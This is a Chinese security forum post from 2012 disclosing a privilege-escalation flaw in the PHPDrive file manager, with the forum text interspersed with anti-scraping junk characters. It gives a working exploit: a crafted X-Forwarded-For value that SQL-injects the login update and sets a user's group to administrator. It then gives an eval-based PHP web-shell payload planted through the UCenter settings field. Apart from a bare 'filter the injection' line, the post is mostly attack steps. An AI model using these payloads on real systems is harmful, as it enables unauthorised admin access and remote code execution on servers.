找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2210|回复: 0
打印 上一主题 下一主题

PHPDrive权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:18:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
$ O! s7 ^) i9 f; q1 T) _: S. R$ [: _3 f) J
includes/user.lib.php
  i0 e# }: A% B0 ~5 f' ^行874 I$ A% b5 G2 U  u8 R
function get_ip() {
5 M  [- S6 M& [8 k3 X if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
4 `% H, V2 R. N9 `- w0 }6 l在用户注册与登录 处module/disk/account.lead.php, [" l* A( m2 M2 b8 q) S
198行 ! I# K$ n: D' C9 s6 b1 \
//更新本次登录IP和时间
0 q- g0 W$ l" U5 `2 [* Y, _             $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生! G7 l9 h! \- i9 ^  e. \2 d5 ?
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限: \$ {; r2 z! }, ]
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
5 j4 u+ n9 k0 e+ d2 y后台getshell:) L/ r, y/ `3 m* k2 k& ]4 S3 l- N
在UCenter设置处,将UC数据库登录名填写为
# Q) |- m& ?/ s, H1 s% w7 g 8 p. W: x/ N( ]: d4 }/ Q$ e- V( q8 U
root’);eval($_POST[DisKill]);?>/*+ }8 H: n' U) _
可以得到一个shell,位置在 data/uc.data.php
! d; f# J" m2 Z& h3 a8 N  g' [+ ~
$ f% t' }' K1 c1 M4 X. P+ S修复:过滤注入6 o9 ^9 {- l# S0 f

" l# S' x! x2 \  Q, }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表